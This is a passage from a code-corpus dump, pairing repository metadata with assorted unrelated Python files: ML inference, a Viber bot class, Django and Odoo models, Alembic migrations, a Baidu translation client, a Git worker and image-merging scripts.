] | 2 | 2019-01-30T17:10:31.000Z | 2019-02-11T07:17:51.000Z | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
] | null | null | null | from model_cgg import model
ckpt = "cgg_36"
mode = 1
from infer import infer, trim_str
from itertools import islice
from util_cw import CharWright
from util_io import load_txt, save_txt
from util_np import np, partition
from util_tf import tf
sess = tf.InteractiveSession()
# load model
cws = CharWright.load("../data/cws.pkl")
cwt = CharWright.load("../data/cwt.pkl")
m = model('infer', cws.dwh(), cwt.dwh())
saver = tf.train.Saver()
saver.restore(sess, "../ckpt/{}".format(ckpt))
# the first 4096 instances are used for validation
src = np.array(list(islice(load_txt("../data/src.txt"), 4096)))
tgt = np.array(list(islice(load_txt("../data/tgt.txt"), 4096)))
val = np.array(sorted(range(len(src)), key= lambda i: len(src[i])))
src = src[val]
tgt = tgt[val]
def translate(src, mode):
for i, j in partition(len(src), 256):
src_idx, len_src = cws(src[i:j], ret_img= False, ret_idx= True)
pred, pidx = infer(mode, m, sess, cwt, src_idx, len_src)
yield from trim_str(pidx, cwt)
save_txt("../tmp/prd", translate(src, mode))
save_txt("../tmp/tgt", tgt)
# sacrebleu -tok intl -b -i ../tmp/prd ../tmp/tgt
| 30.594595 | 71 | 0.681979 | 0 | 0 | 243 | 0.214664 | 0 | 0 | 0 | 0 | 230 | 0.20318 |
25ef3cf038f4dc0c0967a72f05b874c0bdc8e6a9 | 858 | py | Python | viberbot/api/viber_requests/viber_seen_request.py | AaganMaskey/viber-bot-python | 99224b6c777ee3ac9d26a4b1ccd6ae0193291edb | [
"Apache-2.0"
] | 1 | 2019-12-27T17:02:38.000Z | 2019-12-27T17:02:38.000Z | viberbot/api/viber_requests/viber_seen_request.py | AaganMaskey/viber-bot-python | 99224b6c777ee3ac9d26a4b1ccd6ae0193291edb | [
"Apache-2.0"
] | 1 | 2021-06-25T15:17:45.000Z | 2021-06-25T15:17:45.000Z | viberbot/api/viber_requests/viber_seen_request.py | Micuk/viber-bot-python | c090e40a2270f3fec5b5cd34f83334a5797d2bdd | [
"Apache-2.0"
] | null | null | null | from future.utils import python_2_unicode_compatible
from ..event_type import EventType
from viberbot.api.viber_requests.viber_request import ViberRequest
class ViberSeenRequest(ViberRequest):
def __init__(self):
super(ViberSeenRequest, self).__init__(EventType.SEEN)
self._message_token = None
self._user_id = None
def from_dict(self, request_dict):
super(ViberSeenRequest, self).from_dict(request_dict)
self._message_token = request_dict['message_token']
self._user_id = request_dict['user_id']
return self
@property
def meesage_token(self):
return self._message_token
@property
def user_id(self):
return self._user_id
@python_2_unicode_compatible
def __str__(self):
return u"ViberSeenRequest [{0}, message_token={1}, user_id={2}]" \
.format(super(ViberSeenRequest, self).__str__(), self._message_token, self._user_id)
| 28.6 | 87 | 0.785548 | 700 | 0.815851 | 0 | 0 | 321 | 0.374126 | 0 | 0 | 81 | 0.094406 |
25f048f3da02b6db6d6468726b80f5cf0a8210f8 | 172 | py | Python | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 272 | 2020-11-16T05:07:17.000Z | 2022-03-27T11:54:16.000Z | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 14 | 2020-11-20T03:16:14.000Z | 2021-12-01T17:50:41.000Z | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 32 | 2020-11-16T23:36:45.000Z | 2022-02-18T04:48:24.000Z | import torch
import auraloss
input = torch.rand(8, 2, 44100)
target = torch.rand(8, 2, 44100)
loss = auraloss.freq.SumAndDifferenceSTFTLoss()
print(loss(input, target))
| 17.2 | 47 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25f057af076ce41992855839a657edce5d7a7ef6 | 931 | py | Python | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | 1 | 2019-03-03T21:21:07.000Z | 2020-07-02T09:20:31.000Z | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | # ***************************************************************************************
# ***************************************************************************************
#
# Name : processcore.py
# Author : Paul Robson (paul@robsons.org.uk)
# Date : 22nd December 2018
# Purpose : Convert vocabulary.asm to assemblable file by adding marker labels.
#
# ***************************************************************************************
# ***************************************************************************************
#
# Copy vocabulary.asm to __words.asm
#
hOut = open("__words.asm","w")
for l in [x.rstrip() for x in open("vocabulary.asm").readlines()]:
hOut.write(l+"\n")
#
# If ;; found insert a label which is generated using ASCII so all chars can be used
#
if l[:2] == ";;":
name = "_".join([str(ord(x)) for x in l[2:].strip()])
hOut.write("core_{0}:\n".format(name))
hOut.close() | 38.791667 | 89 | 0.396348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 721 | 0.774436 |
25f0a32bd79bafc09891b19c1a08035f8d13f0e4 | 151 | py | Python | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | from basars_addons.schedules.cosine_decay import InitialCosineDecayRestarts
from basars_addons.schedules.cosine_decay import CosineDecayWarmupRestarts
| 50.333333 | 75 | 0.92053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25f245a11f95af9fdc33a4587bdc16ccdade0685 | 1,221 | py | Python | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | 3 | 2018-11-03T09:04:21.000Z | 2018-11-03T09:05:26.000Z | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | null | null | null | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | 4 | 2018-11-03T09:05:20.000Z | 2018-11-05T12:00:30.000Z | import random
import hashlib
import requests
from cctrans import conf
import cctrans
def _sign(app_key, secret_key, text):
salt = random.randint(32768, 65536)
sign = app_key + text + str(salt) + secret_key
return hashlib.md5(sign.encode('utf8')).hexdigest(), salt
def _request_data(url, app_key, text, salt, sign, from_lang='en', to_lang='zh'):
"""
:rtype: object
"""
return "{url}?appid={app_key}&q={text}&from={from_lang}&to={to_lang}&salt={salt}&sign={sign}".format(
**locals()
)
def translation(text, url):
app_key = conf.baidu_app_id
secret_key = conf.baidu_secret_key
sign, salt = _sign(app_key, secret_key, text)
data = _request_data(url=url,
app_key=app_key,
text=text,
salt=salt,
sign=sign,
from_lang=cctrans.from_lang,
to_lang=cctrans.to_lang)
resp = requests.get(data).json()
if resp.get('trans_result'):
trans_result = resp['trans_result']
trans_result = [trans_content['dst'] for trans_content in trans_result]
return trans_result
else:
return None
| 27.75 | 105 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.133497 |
25f290d98ec98408a67808ea297c1e47f77e24a9 | 3,648 | py | Python | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | 2 | 2021-06-10T15:40:25.000Z | 2021-06-12T14:24:28.000Z | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | null | null | null | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | 2 | 2021-09-15T16:09:59.000Z | 2021-09-15T16:11:32.000Z | import os
import sys
from time import sleep
from typing import Optional
from joint_teapot.utils.logger import logger
current_path = sys.path[0]
sys.path.remove(current_path)
from git import Repo
from git.exc import GitCommandError
sys.path.insert(0, current_path)
from joint_teapot.config import settings
class Git:
def __init__(
self,
org_name: str = settings.gitea_org_name,
repos_dir: str = settings.repos_dir,
):
self.org_name = org_name
if not os.path.isdir(repos_dir):
raise Exception(f"{repos_dir} does not exist! Create it first.")
self.repos_dir = repos_dir
logger.debug("Git initialized")
def clone_repo(
self, repo_name: str, branch: str = "master", auto_retry: bool = True
) -> Optional[Repo]:
repo = None
repo_dir = os.path.join(self.repos_dir, repo_name)
retry_interval = 2
while retry_interval and auto_retry:
try:
repo = Repo.clone_from(
f"ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git",
repo_dir,
branch=branch,
)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in clone. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif f"Remote branch {branch} not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/{branch} not found")
else:
raise
return repo
def get_repo(self, repo_name: str) -> Optional[Repo]:
repo_dir = os.path.join(self.repos_dir, repo_name)
if os.path.exists(repo_dir):
return Repo(repo_dir)
return self.clone_repo(repo_name)
def repo_clean_and_checkout(
self, repo_name: str, checkout_dest: str, auto_retry: bool = True
) -> str:
repo_dir = os.path.join(self.repos_dir, repo_name)
repo = self.get_repo(repo_name)
if not repo:
return repo_dir
retry_interval = 2
while retry_interval and auto_retry:
try:
repo.git.fetch("--tags", "--all", "-f")
repo.git.reset("--hard", "origin/master")
repo.git.clean("-d", "-f", "-x")
repo.git.checkout(checkout_dest)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in fetch. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif "Remote branch master not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/master not found")
else:
raise
return repo_dir
| 37.22449 | 90 | 0.544682 | 3,336 | 0.914474 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.192434 |
25f4632219bc28cba2e575a7f1f0e698d9f3b930 | 307 | py | Python | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env bash
trap 'ret=$?; printf "%s\n" "$ERR_MSG" >&2; exit "$ret"' ERR
for file in $(find $1 -name \*.lp.bz2) ; do
echo $file
outputname="../gr/subgraphs/$(basename $file).gr"
./lp2dgf.py -f $file > $outputname
if [ $? -ne 0 ]; then
echo 'ERROR stopping...'
exit 1
fi
done
| 21.928571 | 60 | 0.566775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 127 | 0.413681 |
25f55d84b2c9772cbbe9d0c481378e4191bf77e2 | 362 | py | Python | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from formulario import views
urlpatterns = [
url(r'^form/registro/(?P<pk>\d+)/$', views.RegistroSupraForm.as_view(), name='form_registro'),
url(r'^form/registro/create/$', views.RegistroCreateSupraForm.as_view(), name='form_crear_registro'),
url(r'^list/campo/$', views.CampoListView.as_view(), name='campo_list'),
] | 45.25 | 102 | 0.740331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 121 | 0.334254 |
25f569e19f03eb74cba3e7ed842d1742b9a17719 | 381 | py | Python | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-27 04:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customerauth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='customers',
name='address',
field=models.TextField(blank=True),
),
]
| 20.052632 | 47 | 0.593176 | 288 | 0.755906 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.249344 |
25f57628f67d79914ee5503f127fa52f25876ffe | 424 | py | Python | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 25 | 2020-06-09T01:25:14.000Z | 2021-12-22T10:47:18.000Z | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 7 | 2020-06-21T08:32:26.000Z | 2021-08-04T08:39:10.000Z | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 3 | 2020-06-18T16:47:31.000Z | 2021-08-10T01:04:16.000Z | from .watch_time import time_str
import fitlog
class Logger:
def __init__(self , fil_path = None):
self.log_fil = open(fil_path , "w" , encoding = "utf-8")
def nolog(self , cont = ""):
pass
def log_print(self , cont = ""):
self.log_fil.write(cont + "\n")
self.log_fil.flush()
print (cont)
fitlog.add_to_line(cont)
def log_print_w_time(self , cont = ""):
self.log_print(str(cont) + " | " + time_str())
| 21.2 | 58 | 0.650943 | 374 | 0.882075 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.058962 |
25f9db8faaa586dceb7f4e9535befcaf68ab201f | 1,798 | py | Python | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | null | null | null | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | null | null | null | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | 1 | 2021-09-14T15:19:04.000Z | 2021-09-14T15:19:04.000Z | import cv2
import numpy as np
import os
under_layer_path = '/home/ubuntu/share/cam_lidar/Tu_indoor/red2'
upper_layer_path = "/home/ubuntu/share/cam_lidar/Tu_indoor/aisle02_dir"
target_files = os.listdir(upper_layer_path)
target_imgs = [f for f in target_files if os.path.isfile(os.path.join(upper_layer_path, f))]
try:
target_imgs.remove(".DS_Store")
except ValueError:
pass
lower = np.array([0, 0, 128])
upper = np.array([0, 0, 128])
target_colors = np.array([
[0, 0, 0],
[192, 0, 0],
[128, 64, 128],
[0, 0, 128],
[0, 64, 64],
[128, 128, 192],
[128, 0, 64],
[128, 128, 128],
])
for img_name in target_imgs:
base_img = cv2.imread(os.path.join(under_layer_path, img_name), cv2.IMREAD_COLOR)
result_img = np.zeros(base_img.shape, dtype=base_img.dtype)
img_mask = cv2.inRange(base_img, lower, upper)
img_mask_color = cv2.bitwise_and(base_img, base_img, mask=img_mask)
result_img = cv2.add(result_img, img_mask_color)
cv2.imwrite("result.png", result_img)
target_img = cv2.imread(os.path.join(upper_layer_path, img_name), cv2.IMREAD_COLOR)
for color in target_colors:
img_mask = cv2.inRange(target_img, color, color)
img_mask_inv = cv2.bitwise_not(img_mask)
img_mask_color = cv2.bitwise_and(target_img, target_img, mask=img_mask)
result_img = cv2.bitwise_and(result_img, result_img, mask=img_mask_inv)
result_img = cv2.add(result_img, img_mask_color)
print(os.path.join(upper_layer_path, img_name[:-3]) + "png")
cv2.imwrite(os.path.join(upper_layer_path, img_name[:-3] + "png"), result_img)
| 39.086957 | 92 | 0.627364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 130 | 0.072303 |
25fb9da113f8ffe313c22811acf787eb03963979 | 2,233 | py | Python | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# users.py - functions for validating the user to change information for
#
# Copyright (C) 2013 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
import getpass
import os
import pwd
import sys
class User(object):
def __init__(self, username):
self.myuid = os.getuid()
if username:
userinfo = pwd.getpwnam(username)
else:
self.asroot = False
userinfo = pwd.getpwuid(self.myuid)
(self.username, self.password, self.uid, self.gid, self.gecos,
self.homedir, self.shell) = userinfo
# if we are trying to modify another user we should be root
self.asroot = self.myuid != self.uid
def check(self):
"""Check if the user we want to modify is an LDAP user and whether
we may modify the user information."""
if self.asroot and self.myuid != 0:
print("%s: you may not modify user '%s'.\n" %
(sys.argv[0], self.username))
sys.exit(1)
# FIXME: check if the user is an LDAP user
def get_passwd(self):
"""Ask and return a password that is required to change the user."""
# FIXME: only ask the password if we require it
# (e.g. when root and nslcd has userpwmoddn we don't need to)
return getpass.getpass(
'LDAP administrator password: '
if self.asroot else
'LDAP password for %s: ' % self.username
)
# FIXME: check if the provided password is valid
| 36.606557 | 76 | 0.652485 | 1,324 | 0.592924 | 0 | 0 | 0 | 0 | 0 | 0 | 1,368 | 0.612629 |
25fbbd609cc07a46c89f0cadbaed9a2029ec86bf | 1,739 | py | Python | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | """web dev chapter3 quiz total score
Revision ID: 00f001a958b1
Revises: b95f0132b231
Create Date: 2022-03-02 11:57:04.695611
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00f001a958b1'
down_revision = 'b95f0132b231'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('web_dev_chapter3_quiz_total_score',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('total_score', sa.String(length=64), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('student_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['student_id'], ['student.id'], name=op.f('fk_web_dev_chapter3_quiz_total_score_student_id_student')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_web_dev_chapter3_quiz_total_score'))
)
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'), ['timestamp'], unique=False)
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'), ['total_score'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'))
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'))
op.drop_table('web_dev_chapter3_quiz_total_score')
# ### end Alembic commands ###
| 39.522727 | 130 | 0.748131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 903 | 0.519264 |
25fd8c2e1497e943cb438c2d147ab6c0ea5a6167 | 1,448 | py | Python | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | import csv
import json
import re
import os
import sys
import requests
import base64
PATH = "./output"
stuff = []
with open("thing.txt", "w+") as r:
for path, dirs, files in os.walk(PATH):
for filename in files:
fullpath = os.path.join(path, filename)
with open(fullpath, "r") as f:
line = f.read()
values = line.split("\t")
link = values[4].split("/")
project = link[3]
if project.startswith("BPA"):
program = "bpa"
proj = project[4:]
elif project.startswith("JFDI"):
program = "JFDI"
proj = project[5:]
# print(program + "-" +proj)
s3 = values[4].split("/")
fName = s3[len(s3) - 1]
dump = json.dumps(
{
"did": values[0],
"acl": [program, proj],
"file_name": fName,
"hashes": {"md5": values[1]},
"size": int(values[2]),
"form": "object",
"urls": [values[4]],
}
)
stuff.append(dump)
r.write(dump)
r.write(",\n")
# print(dump)
# url = 'https://qa-bloodpac.planx-pla.net/index/index/'
| 28.96 | 56 | 0.394337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 222 | 0.153315 |
25fdf69d87de987fb580bb1e6d0df092e266a425 | 1,028 | py | Python | eventup/events/models/events.py | Z-Devs-platzi/backend | 66dc436311c1e5e307c5f32d6a151fb9e5d6e0b8 | [
"MIT"
] | null | null | null | eventup/events/models/events.py | Z-Devs-platzi/backend | 66dc436311c1e5e307c5f32d6a151fb9e5d6e0b8 | [
"MIT"
] | 15 | 2020-08-23T18:40:49.000Z | 2022-03-12T00:46:49.000Z | eventup/events/models/events.py | Z-Devs-platzi/event_up-backend | 2b03a87e220cf4d68c4c2c2067096926d6f19b37 | [
"MIT"
] | null | null | null | ''' Events Model '''
import uuid
from django.db import models
# Utils Model
from eventup.utils.models import GeneralModel
class Event(GeneralModel):
''' Event Model '''
# Id
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
# Event data
name = models.CharField(max_length=100, unique=True)
date = models.DateTimeField(null=True, blank=True)
description = models.CharField(max_length=500)
url = models.URLField()
banner_img = models.ImageField(
'banner picture',
upload_to='banner/pictures/',
blank=True,
null=True
)
banner_title = models.CharField(max_length=300, blank=True)
# Event Relations
template = models.ForeignKey(
to="event_templates.Template",
on_delete=models.SET_NULL,
null=True,
)
sponsor = models.ManyToManyField(
to="Sponsor",
)
schedule = models.ManyToManyField(
to="Schedule",
)
def __str__(self):
return str(self.name)
| 23.363636 | 79 | 0.64786 | 901 | 0.876459 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.159533 |
25fe13f7f1b8a734018f17979a1574c47e8eb30b | 3,198 | py | Python | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import uuid
from unittest import TestCase
from hestia.tz_utils import local_now
from marshmallow import ValidationError
from tests.utils import assert_equal_dict
from polyaxon_schemas.api.experiment import ExperimentConfig
from polyaxon_schemas.api.group import GroupConfig
from polyaxon_schemas.api.project import ProjectConfig
class TestProjectConfigs(TestCase):
def test_validate_project_name_config(self):
config_dict = {"name": "test sdf", "description": "", "is_public": True}
with self.assertRaises(ValidationError):
ProjectConfig.from_dict(config_dict)
def test_project_config(self):
config_dict = {
"name": "test",
"description": "",
"is_public": True,
"has_code": True,
"has_tensorboard": True,
"tags": ["foo"],
"num_experiments": 0,
"num_independent_experiments": 0,
"num_experiment_groups": 0,
"num_jobs": 0,
"num_builds": 0,
"created_at": local_now().isoformat(),
"updated_at": local_now().isoformat(),
}
config = ProjectConfig.from_dict(config_dict)
config_to_dict = config.to_dict()
config_to_dict.pop("id", None)
config_to_dict.pop("experiment_groups", None)
config_to_dict.pop("experiments", None)
config_to_dict.pop("has_notebook", None)
config_to_dict.pop("unique_name", None)
config_to_dict.pop("user", None)
config_to_dict.pop("owner", None)
config_to_dict.pop("uuid", None)
assert config_to_dict == config_dict
config_dict.pop("description")
config_dict.pop("updated_at")
config_dict.pop("has_code")
config_to_dict = config.to_light_dict()
config_to_dict.pop("has_notebook", None)
config_to_dict.pop("unique_name", None)
assert config_to_dict == config_dict
config_to_dict = config.to_dict(humanize_values=True)
assert config_to_dict.pop("created_at") == "a few seconds ago"
assert config_to_dict.pop("updated_at") == "a few seconds ago"
config_to_dict = config.to_light_dict(humanize_values=True)
assert config_to_dict.pop("created_at") == "a few seconds ago"
def test_project_experiments_and_groups_config(self):
uuid_value = uuid.uuid4().hex
config_dict = {
"name": "test",
"description": "",
"is_public": True,
"experiment_groups": [
GroupConfig(
content="content", uuid=uuid_value, project=uuid_value
).to_dict()
],
"experiments": [
ExperimentConfig(uuid=uuid_value, project=uuid_value).to_dict()
],
}
config = ProjectConfig.from_dict(config_dict)
assert_equal_dict(config_dict, config.to_dict())
config_dict.pop("description")
config_dict.pop("experiment_groups")
config_dict.pop("experiments")
assert_equal_dict(config_dict, config.to_light_dict())
| 36.758621 | 80 | 0.634459 | 2,773 | 0.867104 | 0 | 0 | 0 | 0 | 0 | 0 | 617 | 0.192933 |
25fef9ef873e5740a2ff06f1845a4837d7c9fc74 | 916 | py | Python | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
class AssignMechanicWizard(models.TransientModel):
_name = 'assign.mechanic.wizard'
_description = 'Assign Mechanic Wizard'
# relations
mechanic_ids = fields.Many2many('hr.employee', string="Assign Mechanic")
repair_id = fields.Many2one("repair.order")
def assign_mechanic(self):
"""
Assign mechanic to the repair.order.
"""
self.repair_id.mechanic_ids = [(6, 0, self.mechanic_ids.ids)]
return True
class AssignBayWizard(models.TransientModel):
_name='assign.bay.wizard'
_description = 'Assign Bay Wizard'
# relations
bay_id = fields.Many2one("bay", "Bay")
repair_id = fields.Many2one("repair.order")
def assign_bay(self):
"""
Assign bay to the repair.order.
"""
self.repair_id.assign_bay_id = self.bay_id
return True | 27.757576 | 76 | 0.648472 | 848 | 0.925764 | 0 | 0 | 0 | 0 | 0 | 0 | 314 | 0.342795 |
25ffe35e8c78cb6840c07e1ba30975649c994db9 | 1,077 | py | Python | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | 1 | 2021-05-11T12:09:00.000Z | 2021-05-11T12:09:00.000Z | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | null | null | null | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | null | null | null | import datetime
from python_to_you.extensions.database import db
from sqlalchemy_serializer import SerializerMixin
class Profile(db.Model, SerializerMixin):
__tablename__ = 'profiles'
id = db.Column(db.Integer, primary_key=True)
